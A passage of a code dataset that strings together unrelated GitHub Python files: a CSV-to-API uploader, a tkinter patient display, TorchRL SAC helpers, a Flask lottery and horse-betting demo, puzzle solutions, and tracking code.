csvRow[2],\r\n 'price': csvRow[3],\r\n 'promo_price': csvRow[4],\r\n 'promo_end_at': csvRow[5],\r\n 'stock': csvRow[6],\r\n 'visible': csvRow[7],\r\n 'promo_start_at': csvRow[5],\r\n 'unit_type': 'UNI'\r\n }\r\n data.append(item_dict)\r\n\r\n data.pop(0)\r\n\r\n #Write data to a Json file\r\n with open(file_in_same_directory('items.json'), \"w\") as jsonFile:\r\n jsonFile.write(json.dumps(data, indent=4, sort_keys=True, default=str))\r\n\r\ndef main():\r\n try:\r\n json_file = csv_to_json()\r\n response = send_product_to_api(json_file)\r\n print(f\"Reason: {response.reason}\\nStatus Code: {response.status_code}\")\r\n\r\n except Exception as e:\r\n print(f\"An error occurred: {e}\")\r\n\r\nif __name__ == \"__main__\":\r\n main()","repo_name":"victorhugomr/integration-aug-23","sub_path":"integration-aug-23.py","file_name":"integration-aug-23.py","file_ext":"py","file_size_in_byte":3595,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"46162133052","text":"import tkinter as tk\nfrom model.observation.observationCode import ObservationCode\nfrom view.moreInfo import MoreInfo\nimport dateutil.parser\n\n\nclass PatientInfo(tk.Frame):\n\n def __init__(self, master, controller, patient, *args, **kwargs):\n \"\"\"\n Display oh patient name and cholesterol info\n :param master: master window\n :param controller: controller to request data from model\n :param patient: patient to get info from\n \"\"\"\n super(PatientInfo, self).__init__(master, *args, **kwargs)\n self.configure(width=950, height=30)\n\n # initialising variables\n self.id = patient.get_identifier()\n self.controller = controller\n self.patient = patient\n\n self.controller.update_patient_obs(ObservationCode.CHOLESTEROL, patient)\n self.controller.update_patient_obs(ObservationCode.BLOOD_PRESSURE, patient)\n self.controller.update_patient_obs(ObservationCode.TOBACCO_SMOKING_STATUS_NHIS, patient)\n\n # creating and placing display\n self.name_label = tk.Label(self, text=patient.get_display_name(), relief=\"groove\")\n self.name_label.place(x=0, y=0, width=200, height=30)\n\n cholesterol = patient.get_latest_observation_entry(ObservationCode.CHOLESTEROL)\n if cholesterol is not None:\n date = dateutil.parser.parse(str(cholesterol.get_date()))\n self.chol_value = tk.Label(self, text=str(cholesterol.get_value()),\n relief=\"groove\")\n self.date_value = tk.Label(self, text=str(date.date()) + \" \" + str(date.hour) + \":\" + str(date.minute) + \":\" + str(date.second), relief=\"groove\")\n else:\n self.chol_value = tk.Label(self,\n text=\"N/A\",\n relief=\"groove\")\n self.date_value = tk.Label(self, text=\"N/A\", relief=\"groove\")\n\n blood_test = patient.get_latest_observation_entry(ObservationCode.BLOOD_PRESSURE)\n if blood_test is not None:\n date = dateutil.parser.parse(str(blood_test.get_date()))\n self.sys_value = tk.Label(self, text=str(blood_test.get_value()['Systolic_value']), relief=\"groove\")\n self.dia_value = tk.Label(self, text=str(blood_test.get_value()['Diastolic_value']), relief=\"groove\")\n self.date_value2 = tk.Label(self, text=str(date.date()) + \" \" + str(date.hour) + \":\" + str(\n date.minute) + \":\" + str(date.second), relief=\"groove\")\n else:\n self.sys_value = tk.Label(self,\n text=\"N/A\",\n relief=\"groove\")\n self.dia_value = tk.Label(self,\n text=\"N/A\",\n relief=\"groove\")\n self.date_value2 = tk.Label(self, text=\"N/A\", relief=\"groove\")\n self.chol_value.place(x=200, y=0, width=175, height=30)\n self.date_value.place(x=375, y=0, width=125, height=30)\n self.dia_value.place(x=500, y=0, width=100, height=30)\n self.sys_value.place(x=600, y=0, width=100, height=30)\n self.date_value2.place(x=700, y=0, width=125, height=30)\n\n # Button to open more info window\n more_info = tk.Button(self, text=\"More Patient Info\", relief=\"groove\", bg=\"lime\", command=self.__more_info_window)\n more_info.place(x=825, y=0, width=100, height=30)\n\n def update_obs(self):\n \"\"\"\n updates cholesterol value to most recent\n :return: None\n \"\"\"\n cholesterol = self.patient.get_latest_observation_entry(ObservationCode.CHOLESTEROL)\n if cholesterol is not None:\n date = dateutil.parser.parse(str(cholesterol.get_date()))\n self.chol_value['text'] = str(cholesterol.get_value())\n self.date_value['text'] = str(date.date()) + \" \" + str(date.hour) + \":\" + str(date.minute) + \":\" + str(date.second)\n\n blood = self.patient.get_latest_observation_entry(ObservationCode.BLOOD_PRESSURE)\n if blood is not None:\n date = dateutil.parser.parse(str(blood.get_date()))\n self.sys_value['text'] = str(blood.get_value()['Systolic_value'])\n self.dia_value['text'] = str(blood.get_value()['Diastolic_value'])\n self.date_value2['text'] = str(date.date()) + \" \" + str(date.hour) + \":\" + str(date.minute) + \":\" + str(date.second)\n\n def highlight_text(self):\n \"\"\"\n Highlight cholesterol and name\n :return: None\n \"\"\"\n self.chol_value['fg'] = 'red'\n self.name_label['fg'] = 'red'\n\n def highlight_dia(self):\n self.dia_value['fg'] = 'purple'\n\n def default_dia(self):\n self.dia_value['fg'] = 'black'\n\n def highlight_sys(self):\n self.sys_value['fg'] = 'purple'\n\n def default_sys(self):\n self.sys_value['fg'] = 'black'\n\n def default_text(self):\n \"\"\"\n Remove highlight from cholesterol and name\n :return: None\n \"\"\"\n self.chol_value['fg'] = 'black'\n self.name_label['fg'] = 'black'\n\n def __more_info_window(self):\n \"\"\"\n Open more info for patient\n :return: None\n \"\"\"\n self.wait_window(MoreInfo(self, self.patient, self.controller))\n","repo_name":"mt-empty/FHIR_application","sub_path":"src/view/patientInfo.py","file_name":"patientInfo.py","file_ext":"py","file_size_in_byte":5290,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"20673783185","text":"import torch\nfrom tensordict.nn import InteractionType, TensorDictModule\nfrom tensordict.nn.distributions import NormalParamExtractor\nfrom torch import nn, optim\nfrom torchrl.collectors import SyncDataCollector\nfrom torchrl.data import TensorDictPrioritizedReplayBuffer, TensorDictReplayBuffer\nfrom torchrl.data.replay_buffers.storages import LazyMemmapStorage\nfrom torchrl.envs import Compose, DoubleToFloat, EnvCreator, ParallelEnv, TransformedEnv\nfrom torchrl.envs.libs.gym import GymEnv\nfrom torchrl.envs.transforms import RewardScaling\nfrom torchrl.envs.utils import ExplorationType, set_exploration_type\nfrom torchrl.modules import MLP, ProbabilisticActor, ValueOperator\nfrom torchrl.modules.distributions import TanhNormal\nfrom torchrl.objectives import SoftUpdate\nfrom torchrl.objectives.sac import SACLoss\n\n\n# ====================================================================\n# Environment utils\n# -----------------\n\n\ndef env_maker(task, frame_skip=1, device=\"cpu\", from_pixels=False):\n return GymEnv(task, device=device, frame_skip=frame_skip, from_pixels=from_pixels)\n\n\ndef apply_env_transforms(env, reward_scaling=1.0):\n transformed_env = TransformedEnv(\n env,\n Compose(\n RewardScaling(loc=0.0, scale=reward_scaling),\n DoubleToFloat(in_keys=[\"observation\"], in_keys_inv=[]),\n ),\n )\n return transformed_env\n\n\ndef make_environment(cfg):\n \"\"\"Make environments for training and evaluation.\"\"\"\n parallel_env = ParallelEnv(\n cfg.collector.env_per_collector,\n EnvCreator(lambda: env_maker(task=cfg.env.name)),\n )\n parallel_env.set_seed(cfg.env.seed)\n\n train_env = apply_env_transforms(parallel_env)\n\n eval_env = TransformedEnv(\n ParallelEnv(\n cfg.collector.env_per_collector,\n EnvCreator(lambda: env_maker(task=cfg.env.name)),\n ),\n train_env.transform.clone(),\n )\n return train_env, eval_env\n\n\n# ====================================================================\n# Collector and replay buffer\n# ---------------------------\n\n\ndef make_collector(cfg, train_env, actor_model_explore):\n \"\"\"Make collector.\"\"\"\n collector = SyncDataCollector(\n train_env,\n actor_model_explore,\n frames_per_batch=cfg.collector.frames_per_batch,\n max_frames_per_traj=cfg.collector.max_frames_per_traj,\n total_frames=cfg.collector.total_frames,\n device=cfg.collector.collector_device,\n )\n collector.set_seed(cfg.env.seed)\n return collector\n\n\ndef make_replay_buffer(\n batch_size,\n prb=False,\n buffer_size=1000000,\n buffer_scratch_dir=\"/tmp/\",\n device=\"cpu\",\n prefetch=3,\n):\n if prb:\n replay_buffer = TensorDictPrioritizedReplayBuffer(\n alpha=0.7,\n beta=0.5,\n pin_memory=False,\n prefetch=prefetch,\n storage=LazyMemmapStorage(\n buffer_size,\n scratch_dir=buffer_scratch_dir,\n device=device,\n ),\n batch_size=batch_size,\n )\n else:\n replay_buffer = TensorDictReplayBuffer(\n pin_memory=False,\n prefetch=prefetch,\n storage=LazyMemmapStorage(\n buffer_size,\n scratch_dir=buffer_scratch_dir,\n device=device,\n ),\n batch_size=batch_size,\n )\n return replay_buffer\n\n\n# ====================================================================\n# Model\n# -----\n\n\ndef get_activation(cfg):\n if cfg.network.activation == \"relu\":\n return nn.ReLU\n elif cfg.network.activation == \"tanh\":\n return nn.Tanh\n elif cfg.network.activation == \"leaky_relu\":\n return nn.LeakyReLU\n else:\n raise NotImplementedError\n\n\ndef make_sac_agent(cfg, train_env, eval_env, device):\n \"\"\"Make SAC agent.\"\"\"\n # Define Actor Network\n in_keys = [\"observation\"]\n action_spec = train_env.action_spec\n if train_env.batch_size:\n action_spec = action_spec[(0,) * len(train_env.batch_size)]\n actor_net_kwargs = {\n \"num_cells\": cfg.network.hidden_sizes,\n \"out_features\": 2 * action_spec.shape[-1],\n \"activation_class\": get_activation(cfg),\n }\n\n actor_net = MLP(**actor_net_kwargs)\n\n dist_class = TanhNormal\n dist_kwargs = {\n \"min\": action_spec.space.minimum,\n \"max\": action_spec.space.maximum,\n \"tanh_loc\": False,\n }\n\n actor_extractor = NormalParamExtractor(\n scale_mapping=f\"biased_softplus_{cfg.network.default_policy_scale}\",\n scale_lb=cfg.network.scale_lb,\n )\n actor_net = nn.Sequential(actor_net, actor_extractor)\n\n in_keys_actor = in_keys\n actor_module = TensorDictModule(\n actor_net,\n in_keys=in_keys_actor,\n out_keys=[\n \"loc\",\n \"scale\",\n ],\n )\n actor = ProbabilisticActor(\n spec=action_spec,\n in_keys=[\"loc\", \"scale\"],\n module=actor_module,\n distribution_class=dist_class,\n distribution_kwargs=dist_kwargs,\n default_interaction_type=InteractionType.RANDOM,\n return_log_prob=False,\n )\n\n # Define Critic Network\n qvalue_net_kwargs = {\n \"num_cells\": cfg.network.hidden_sizes,\n \"out_features\": 1,\n \"activation_class\": get_activation(cfg),\n }\n\n qvalue_net = MLP(\n **qvalue_net_kwargs,\n )\n\n qvalue = ValueOperator(\n in_keys=[\"action\"] + in_keys,\n module=qvalue_net,\n )\n\n model = nn.ModuleList([actor, qvalue]).to(device)\n\n # init nets\n with torch.no_grad(), set_exploration_type(ExplorationType.RANDOM):\n td = eval_env.reset()\n td = td.to(device)\n for net in model:\n net(td)\n del td\n eval_env.close()\n\n return model, model[0]\n\n\n# ====================================================================\n# SAC Loss\n# ---------\n\n\ndef make_loss_module(cfg, model):\n \"\"\"Make loss module and target network updater.\"\"\"\n # Create SAC loss\n loss_module = SACLoss(\n actor_network=model[0],\n qvalue_network=model[1],\n num_qvalue_nets=2,\n loss_function=cfg.optimization.loss_function,\n delay_actor=False,\n delay_qvalue=True,\n )\n loss_module.make_value_estimator(gamma=cfg.optimization.gamma)\n\n # Define Target Network Updater\n target_net_updater = SoftUpdate(\n loss_module, eps=cfg.optimization.target_update_polyak\n )\n return loss_module, target_net_updater\n\n\ndef make_sac_optimizer(cfg, loss_module):\n \"\"\"Make SAC optimizer.\"\"\"\n optimizer = optim.Adam(\n loss_module.parameters(),\n lr=cfg.optimization.lr,\n weight_decay=cfg.optimization.weight_decay,\n )\n return optimizer\n","repo_name":"feifeifei416/rl","sub_path":"examples/sac/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":6734,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"32"} +{"seq_id":"41740149736","text":"import sys\nfrom collections import deque\n\nn,m=map(int,sys.stdin.readline().split(\" \"))\n\narr=[list(map(int,sys.stdin.readline().strip())) for _ in range(n)]\n\nfixed_arr=[]\n\nmove=[[1,-1,0,0],[0,0,1,-1]]\n\nchecked=[[0]*m for _ in range(n)]\n\nque=deque()\n\ncount=0\n\nstack=[] ## 배열들 보관했다가 값 바꿔줌\n\nindex=0\n\nfor i in range(n): ## 먼저 한번 돌리면서 각각 연결되어있는 0들이 몇개씩 연결되있는지 센다음 표시해주고 나중에 구분을 위해 index도 부여해서 리스트로 [겂,인덱스]이렇게 만든다\n for j in range(m):\n if(arr[i][j]==1):\n arr[i][j]=-1\n if(arr[i][j]==0 and checked[i][j]==0):\n count+=1\n checked[i][j]=1\n stack.append([i,j])\n que.append([i,j])\n while(que):\n item=que.popleft()\n for k in range(4):\n x=item[0]+move[0][k]\n y=item[1]+move[1][k]\n if(0<=x\")\ndef show_lottery_details(id):\n lottery = requests.get(f\"http://localhost:5000/lottery/{id}\").json()\n\n txs = lottery['users'] \n \n buffer = BytesIO()\n \n qr_data = f\"tron:{lottery['address']}?token=TRX&amount={lottery['prize']}¬e={lottery['id']}\"\n qr = qrcode.QRCode(version=1, box_size=4, border=1)\n qr.add_data(qr_data)\n qr.make(fit=True)\n\n img = qr.make_image(fill_color=\"#F0B90B\", back_color=\"#2c2c2c\")\n img.save(buffer, format=\"PNG\")\n qr_png = buffer.getvalue()\n qr_base64 = base64.b64encode(qr_png).decode()\n\n return render_template(\"lotto.html\", lottery=lottery, txs=txs, qr=qr_base64)\n\n\nif __name__ == \"__main__\":\n app.run(debug=True, port=4999)","repo_name":"dreistein33/jackpotron","sub_path":"routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":1608,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"38194565564","text":"import sys\nimport os\n\nmodels_path = \"models\"\n# this will break any attempt to import xformers which will prevent stability diffusion repo from trying to use it\nif \"--xformers\" not in \"\".join(sys.argv):\n sys.modules[\"xformers\"] = None\n\nif \"--no-half-vae\" not in \"\".join(sys.argv):\n sys.argv.append('--no-half-vae')\nsys.argv.append(f'--clip-models-path={models_path}/CLIP')\n","repo_name":"ChengLong1222/stable-diffusion-webui","sub_path":"modules/import_hook.py","file_name":"import_hook.py","file_ext":"py","file_size_in_byte":378,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"32"} +{"seq_id":"23744291654","text":"#Christan Park\n#worksheet on strings \nimport os\nos.system(\"cls\")\n\n#Question 1: get first middle and last letters\n\n#method 1\na = \"James\"\nprint(len(a)) #number of letter in word\nprint(a[0], end='') #get first letter\nprint(a[2], end='') #put middle letter on same line\nprint(a[4]) #put last letter on same line\n\n#method 2\nword = input('Your word is ') #get word from user\nnumber = (len(word)) #get the number of letters in the word\nfirst = word[0] #get first letter of word\nmiddleNumber = int(number/2) #get the number of the middle digit in word\nmiddle = word[middleNumber] #get the middle letter\nlast = word[number-1] #get last letter\nprint(first+middle+last) #print first middle and last letter together \n\n\n#Question 2: Create a string made of the middle three characters\n\nword = input('Your word is ') #get word from user\nnumber = len(word) #get number of letters in the word\nmiddle2=number//2 #double division -> integer division\nmiddleFirst = word[middle2-1:middle2+2]\nprint(middleFirst)\n#print(\"The middle three characters are:\",word[middle2-1]+word[middle2]+word[middle2+1])\n\n\n#Question 3: Append New string in the middle of a given string\n\nword = input('Your word is ') #get word from user\nword2 = input('Your second word is ') #get seocnd word \nmiddleNumber2 = (len(word)//2) #get which number letter is the middle\nhalf1=len(word)//2 #make half1 = middle letter number \nprint(word[0:half1]+word2+word[half1:len(word)]) #print first word of word1 to half then insert word2 and rest of word with back half of word1\n\n\n#Question 4: Create a new string made of the first, middle, and last characters of each input string\n\nword3 = input('Your word is ') #get word from user\nword4 = input('Your second word is ') #get second word\nfirst1=word3[0] #get first letter of first word\nfirst2=word4[0] #get first letter of second word \nmiddle3=word3[len(word3)//2] #get middle letter of first word\nmiddle4=word4[len(word4)//2] #get middle letter of seocnd word\nlast2=word3[len(word3)-1] #get last letter of first word\nlast3=word4[len(word4)-1] #get last letter of second word\nprint(first1+first2+middle3+middle4+last2+last3) #add all letters together \n\n\n#Question 5:Arrange string characters such that lowercase letters should come first\n\nword5 = input('Your word is ')\nlower = []\nupper = []\nfor characters in word5:\n if characters.islower(): #islower -> returns True if all characters in the string are lower case\n lower.append(characters) #append moves characters to end of list\n else:\n upper.append(characters) #append moves characters to end of list\n\nprint(lower)\nprint(upper)\nsortedWord = ''.join(lower + upper) # join() takes all items and joines them into one string\nprint('Sorted word is ', sortedWord)\n\n#!!!!! Why need ''. before join???? -> https://stackoverflow.com/questions/14868763/global-name-join-is-not-defined-django\n\n\n","repo_name":"parkc25/MorningGameDesign","sub_path":"Introduction/StringsAssignment.py","file_name":"StringsAssignment.py","file_ext":"py","file_size_in_byte":2851,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"1083096913","text":"file = open(\"aoc21_input.txt\")\nl = file.read().split(\"\\n\")\nfile.close()\n\nd = {}\n\nall_food = set()\namount = {}\n\nfor i in l:\n s = i.split(\" (contains \")\n food = set(s[0].split())\n allergens = s[1][:-1].split(\", \")\n\n all_food |= food\n\n for j in food:\n if j in amount:\n amount.update({j: amount[j]+1})\n else:\n amount.setdefault(j, 1)\n\n for j in allergens:\n if j in d.keys():\n n = d[j] & food\n d.update({j: n})\n else:\n d.setdefault(j, food)\n\nprint(d)\n\nwhile True:\n for i in d.keys():\n if len(d[i]) == 1:\n this_food = list(d[i])[0]\n for j in d.keys():\n if i == j:\n continue\n if this_food in d[j]:\n s = d[j]\n s.remove(this_food)\n d.update({j: s})\n \n looping = False\n for i in d.keys():\n if len(d[i]) > 1:\n looping = True\n if not looping:\n break\n\nprint(d)\n\nrl = []\nfor i in sorted(d.keys()):\n rl.append(list(d[i])[0])\n\nprint(\",\".join(rl))","repo_name":"TimHuisman1703/AdventOfCode","sub_path":"2020/Day 21/aoc21_2.py","file_name":"aoc21_2.py","file_ext":"py","file_size_in_byte":1109,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"30119032137","text":"\"\"\"\r\n\n\nGiven a list, create a function that returns a dictionary detailing how many\ntimes each element was repeated.\n\n### Examples\n\n count_repetitions([\"cat\", \"dog\", \"cat\", \"cow\", \"cow\", \"cow\"]) ➞ { cow: 3, cat: 2, dog: 1 }\n \n count_repetitions([1, 5, 5, 5, 12, 12, 0, 0, 0, 0, 0, 0]) ➞ { 0: 6, 5: 3, 12: 2, 1: 1 }\n \n count_repetitions([\"Infinity\", \"null\", \"Infinity\", \"null\", \"null\"]) ➞ { \"null\": 3, \"Infinity\": 2}\n\n### Notes\n\nN/A\n\n\"\"\"\r\n\ndef count_repetitions(lst):\n dic1 = {}\n for i in lst:\n if i not in dic1:\n dic1[i] = 1\n else:\n x = dic1[i]\n x += 1\n dic1[i] = x\n return dic1\n\n","repo_name":"daniel-reich/turbo-robot","sub_path":"gDtHS9cAy8Fs2X7pH_23.py","file_name":"gDtHS9cAy8Fs2X7pH_23.py","file_ext":"py","file_size_in_byte":630,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"2472358080","text":"st = input()\nl = len(st)\nfirstLt = int(st[0])\np = []\nfor i in range(1, l):\n p.append(i)\nlp = len(p)\nif firstLt == lp:\n print(\"TRUE {}\".format(lp))\nelse:\n print(\"FALSE {}\".format(lp))\n\n\"\"\"\ninp: 5hello\nolp: TRUE 5\n\"\"\"\n","repo_name":"rajeswari98/Python-Codes","sub_path":"LetUsCrackCodes/digitalTCS1.py","file_name":"digitalTCS1.py","file_ext":"py","file_size_in_byte":225,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"4187488630","text":"from requests_queue.handlers.base import BaseHandler\nfrom requests_queue.serializers.request import RequestSerializer\nfrom requests_queue.domain.requests import Requests\nfrom .utils import parse_body\n\n\nclass RequestsIndexHandler(BaseHandler):\n def initialize(self, db_session):\n self.db_session = db_session\n self.requests_repo = Requests(self.db_session)\n\n def post(self):\n json = parse_body(self.request)\n request = self.requests_repo.create(json[\"creator_id\"], json[\"request\"])\n self.set_status(202)\n self.write(RequestSerializer().dump(request).data)\n\n def get(self, **kwargs):\n creator_id = self.get_argument('creator_id', None)\n requests = self.requests_repo.get_many(creator_id=creator_id)\n serialized_requests = RequestSerializer().dump(requests, many=True).data\n self.write({'requests': serialized_requests})\n","repo_name":"dod-ccpo/requests-queue","sub_path":"requests_queue/handlers/requests_index.py","file_name":"requests_index.py","file_ext":"py","file_size_in_byte":897,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"70927137050","text":"'''\r\n\r\nAuthor: Delzad Bamji\r\n'''\r\n\r\nfrom flask import Flask, render_template, request, redirect, g\r\n\r\nimport shelve\r\nfrom flask_restful import Resource, Api, reqparse\r\nimport sqlite3\r\nimport requests\r\nimport pandas as pd\r\nimport json\r\nimport configparser\r\n\r\napp = Flask(__name__)\r\napi = Api(app)\r\n\r\n# def get_db():\r\n# db = getattr(g, '_database', None)\r\n# if db is None:\r\n#\r\n# db = g._database = sqlite3.connect(\"HORSEDATA.db\")\r\n# cur = db.cursor()\r\n# cur.execute(\r\n# \"\"\"create table if not exists {} (\r\n# id integer PRIMARY KEY NOT NULL,\r\n# name text,\r\n# price integer,\r\n# age integer,\r\n# height float,\r\n# sex text)\"\"\".format(\"Horse\")\r\n# )\r\n#\r\n# with open(\"HorsePrices.csv\", \"r\") as f:\r\n# content = f.read().split(\"\\n\")\r\n# i = len(content)\r\n# for line in content:\r\n# if i == 1:\r\n# break\r\n# # print(line)\r\n# line = line.split(\",\")\r\n# sql = \"insert into Horse(id,name,price,age,height,sex) values(\" + line[1] + \",\" + \"'\" + line[\r\n# 2] + \"'\" + \",\" + line[3] + \",\" + line[4] + \",\" + line[5] + \",\" + \"'\" + line[6] + \"'\" + \")\"\r\n# cur.execute(sql)\r\n# i -= 1\r\n#\r\n# return db\r\n\r\n#\r\n# @app.teardown_appcontext\r\n# def teardown_db(exception):\r\n# db = getattr(g, '_database', None)\r\n# if db is not None:\r\n# db.close()\r\n\r\nconfig = configparser.ConfigParser()\r\nconfig.read('configheader.properties')\r\nconfig[\"configheader\"][\"flag\"] = \"False\"\r\nwith open('configheader.properties', 'w') as configfile:\r\n config.write(configfile)\r\n\r\n\r\n\r\n@app.route(\"/\", methods=[\"GET\", \"POST\"])\r\ndef index():\r\n horse_data = \"\"\r\n warning = \"\"\r\n sqlstring = \"\"\r\n endpoint_info={}\r\n querying=\"\"\r\n # if post method is called after form submission\r\n if request.method == \"POST\":\r\n print(\"FORM DATA RECEIVED IN POST METHOD\")\r\n\r\n\r\n# /////////////////////////\r\n\r\n if \"nm\" in request.form:\r\n print(request.form[\"nm\"])\r\n horseName = request.form[\"nm\"]\r\n getSql = \"http://localhost:5000/horses/\"+horseName\r\n print(getSql)\r\n response = requests.get(getSql)\r\n print(response)\r\n json_data = response.json()\r\n horse_data = json_data[\"data\"]\r\n print(json_data)\r\n sqlstring = getSql\r\n endpoint_info=json_data\r\n querying=\"full\"\r\n # -------------------setting config header-----------------------#\r\n config[\"configheader\"][\"flag\"] = \"True\"\r\n with open('configheader.properties', 'w') as configfile:\r\n config.write(configfile)\r\n\r\n if config[\"configheader\"][\"flag\"] == \"True\" or config[\"configheader\"][\"flag\"] == True:\r\n print(\"config is true\")\r\n else:\r\n print(\"config is still false\")\r\n\r\n if \"HorseId\" in request.form:\r\n print(request.form[\"HorseId\"])\r\n if config[\"configheader\"][\"flag\"] == \"True\" or config[\"configheader\"][\"flag\"] == True:\r\n\r\n HorseId = request.form[\"HorseId\"]\r\n HorseId = int(HorseId)\r\n if \"account\" in request.form:\r\n print(request.form[\"account\"])\r\n account = request.form[\"account\"]\r\n account = float(account)\r\n sqlstring=\"http://localhost:5000/horselist\"\r\n response2 = requests.get(sqlstring)\r\n\r\n all_horses = response2.json()[\"data\"]\r\n\r\n listall = list(all_horses[\"HorseID\"].values())\r\n\r\n if HorseId in listall:\r\n\r\n inde = list(all_horses[\"HorseID\"].keys())[list(all_horses[\"HorseID\"].values()).index(HorseId)]\r\n\r\n horse_data = {'id': all_horses[\"HorseID\"][inde], 'name': all_horses[\"name\"][inde], 'Price': all_horses[\"Price\"][inde],\r\n 'Age': all_horses[\"Age\"][inde], 'Height': all_horses[\"Height\"][inde], 'Sex': all_horses[\"Sex\"][inde]}\r\n\r\n if account>= float(horse_data['Price']):\r\n endpoint_info={\"message\":\"Successfully placed a bet on the horse\",\"data\":horse_data}\r\n else:\r\n endpoint_info = {\"message\": \"OOPS!!! Insufficient funds, check the price for the horse and try again\", \"data\": {}}\r\n else:\r\n horse_data=\"{}\"\r\n endpoint_info={\"message\":\"no horse found\",\"data\":{}}\r\n\r\n config[\"configheader\"][\"flag\"] = \"False\"\r\n with open('configheader.properties', 'w') as configfile:\r\n config.write(configfile)\r\n\r\n else:\r\n warning=\"{\\\"message\\\":FATAL ERROR! Please send a query in 1. before placing a bet here,\\\"data\\\":{}}\"\r\n\r\n\r\n else:\r\n # redirect(request.url)\r\n return render_template('index.html', ISO=\"\")\r\n return render_template('index.html', sql_string=sqlstring, horse_data=horse_data, endpoint_info=endpoint_info,querying=querying, warning=warning)\r\n\r\n\r\n# class HorseList(Resource):\r\n\r\n\r\nclass Horse(Resource):\r\n def get(self):\r\n data = pd.read_csv('HorsePricesREST.csv')\r\n data = data.to_dict()\r\n return {\"message\":\"success\",\"data\":data},200\r\n\r\n def get(self, name):\r\n\r\n try:\r\n data = pd.read_csv('HorsePricesREST.csv')\r\n data = data.to_dict()\r\n inde = list(data[\"name\"].keys())[list(data[\"name\"].values()).index(name)]\r\n # print(inde)\r\n obj = {'id': data[\"HorseID\"][inde], 'name': data[\"name\"][inde], 'Price': data[\"Price\"][inde],\r\n 'Age': data[\"Age\"][inde], 'Height': data[\"Height\"][inde], 'Sex': data[\"Sex\"][inde]}\r\n # print(obj)\r\n if not obj:\r\n return {'message': \"no horse found\", \"data\": {}}, 404\r\n else:\r\n return {'message': \"success\", \"data\": obj}, 200\r\n\r\n except Exception as e:\r\n return {'message':\"no horse found\",\"data\":{}},404\r\n\r\n\r\nclass User(Resource):\r\n pass\r\n\r\nclass horseList(Resource):\r\n def get(self):\r\n data = pd.read_csv('HorsePricesREST.csv')\r\n data = data.to_dict()\r\n return {\"message\":\"success\",\"data\":data},200\r\n\r\napi.add_resource(User, '/users')\r\n\r\napi.add_resource(Horse, '/horses/')\r\n\r\napi.add_resource(horseList, '/horselist')\r\n\r\n\r\nif __name__ == \"__main__\":\r\n app.run(debug=True, threaded=True)\r\n\r\n","repo_name":"delzadbamji/horseRacing-restAPI-Flask","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":6636,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"72006352090","text":"import torch\nimport math\nimport numpy as np\nimport os\nimport io\nimport copy\nimport ctypes\nimport random\nfrom . import basic\n\nclass NN_policy(object):\n def __init__(self,actor,epsilon):\n self.actor = copy.deepcopy(actor) \n self.epsilon = epsilon \n def inference(self,obs_list):\n with torch.no_grad():\n pos = torch.Tensor(np.vstack([obs.pos for obs in obs_list])).cuda()\n laser_data = torch.Tensor(np.vstack([obs.laser_data for obs in obs_list])).cuda()\n \n action = self.actor(pos,laser_data).cpu().numpy()\n if random.random() int:\n need = sum(nums)%p\n if need ==0:\n return 0\n print(need,\"dfscdscsd\")\n n=len(nums)\n res=n\n dic=defaultdict(int)\n dic[0]=-1\n cur= 0\n for i in range(n):\n cur=(cur+nums[i])%p\n \n if (cur-need)%p in dic:\n res = min(res,i-dic[(cur-need)%p])\n dic[cur]=i\n\n return res if res args.max_iter:\n logger.info('Max iteration exceeds')\n break\n\n if len(np.where(is_good == 0)[0]) == 0:\n\n # two pass training\n if count == args.max_pass:\n break\n else:\n count += 1\n logger.info('***pass {} finished'.format(count))\n # todo change shape from (num_train) to (num_train, 1)\n is_good = np.zeros((num_train, 1))\n is_good[is_difficult == 1] = 1\n counter = np.zeros((num_train, 1))\n t = -1\n # find a sequence to train\n while True:\n t = t + 1\n if t >= num_train:\n t = 0\n if is_good[t] == 0:\n break\n\n if args.is_text:\n logger.info('Tracking sequence {}'.format(t))\n\n dres_gt = dres_train[t]\n\n # first frame\n fr = dres_gt['fr'][0]\n identity = dres_gt['id'][0]\n\n # reset tracker : Transfer the MDP to Tracked.\n tracker.prev_state = 1\n tracker.state = 1\n tracker.target_id = identity\n\n # For LSTM tracker\n tracker.prev_frames = []\n tracker.prev_det_id = []\n\n # start tracking\n while fr <= seq_num:\n if args.is_text:\n logger.info('frame {}, state {}'.format(fr, tracker.state))\n\n # extract detection\n # todo doubt\n index = np.where(dres_det['fr'] == fr)[0]\n dres = sub(dres_det, index)\n num_det = len(dres['fr'])\n\n # inactive\n if tracker.state == 0:\n if reward == 1:\n is_good[t] = 1\n logger.info('sequence {} is good'.format(t))\n break\n\n # active\n elif tracker.state == 1:\n\n # compute overlap\n overlap, _, _ = calc_overlap(dres_gt, 0, dres, np.arange(num_det))\n ind = np.argmax(overlap)\n ov = overlap[ind]\n if args.is_text:\n logger.info('Start first frame overlap {:.2}'.format(ov))\n\n # initialize the LK tracker : Initial the target template\n tracker = lk_initialize(tracker, fr, identity, dres, ind, dres_image)\n tracker.state = 2\n tracker.streak_occluded = 0\n\n # build the dres structure\n dres_one = sub(dres, ind)\n tracker.dres = dres_one\n tracker.dres['id'] = np.array([tracker.target_id])\n tracker.dres['state'] = np.array([tracker.state])\n\n if tracker.is_lstm == 1:\n tracker = add_to_target_queue(tracker, dres_one['fr'], dres_one['id'], args.is_text)\n\n # tracker\n elif tracker.state == 2:\n tracker.streak_occluded = 0\n # todo verify mdp_value\n tracker, _, _ = mdp_value(tracker, fr, dres_image, 